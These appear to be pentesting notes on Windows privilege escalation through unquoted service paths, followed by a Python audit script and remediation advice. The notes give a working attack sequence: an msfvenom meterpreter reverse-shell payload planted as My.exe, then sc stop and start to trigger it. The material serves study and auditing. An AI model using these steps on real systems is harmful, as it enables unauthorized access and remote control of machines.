Unquoted Service path
- Check for any service with an unquoted path like C:\Program Files\My Program\My Service\svice.exe. If the service path is stored unquoted, whenever Windows starts the service it will attempt to run an executable from the following paths:
C:\Program.exe
C:\Program Files\My.exe
C:\Program Files\My Program\My.exe
C:\Program Files\My Program\My Service\svice.exe
- We can put My.exe in My Program if we have write permission. Can put an adduser exe like in
- Or we can create a reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > My.exe
- Stop the service
sc stop svice.exe
- Transfer My.exe into My Program
- Start service
sc start svice.exe
- Now the exploit is successful
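
The path search described in the first step, turned into an audit check (an added example, not part of the original notes): for each service path it lists the earlier executables Windows would try before the intended binary. The service names and paths in SAMPLE_SERVICES are constructed, and the code assumes the service binary name ends in .exe.

```python
import re

# Constructed sample data (service name -> ImagePath), not taken from a real host.
SAMPLE_SERVICES = {
    "svice": r"C:\Program Files\My Program\My Service\svice.exe",
    "quoted": r'"C:\Program Files\Vendor App\agent.exe" --run',
    "nospace": r"C:\Windows\System32\svchost.exe -k netsvcs",
    "withargs": r"C:\Program Files\Tool\tool.exe /service",
}

def executable_part(image_path):
    """Return the path up to and including the first '.exe' (arguments dropped)."""
    m = re.match(r"(?i)^(.*?\.exe)\b", image_path.strip())
    return m.group(1) if m else image_path.strip()

def candidate_paths(image_path):
    """List the executables Windows tries, in order, for an unquoted path."""
    path = image_path.strip()
    if path.startswith('"'):
        return []  # quoted: the path is not split on spaces
    exe = executable_part(path)
    parts = exe.split(" ")
    # Every space is a possible end of the program name, tried left to right.
    tries = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    tries.append(exe)  # the intended binary is tried last
    return tries

def audit(services):
    """Return {service: paths tried before the real binary} for risky entries."""
    findings = {}
    for name, image_path in services.items():
        tries = candidate_paths(image_path)
        if len(tries) > 1:  # unquoted and contains at least one space
            findings[name] = tries[:-1]
    return findings

if __name__ == "__main__":
    for name, paths in audit(SAMPLE_SERVICES).items():
        print(f"[!] {name}: unquoted path with spaces")
        for p in paths:
            print(f"      tried before the real binary: {p}")
```

Any service it reports should have its path wrapped in double quotes, and the directories that would hold the listed files should not be writable by non-administrators.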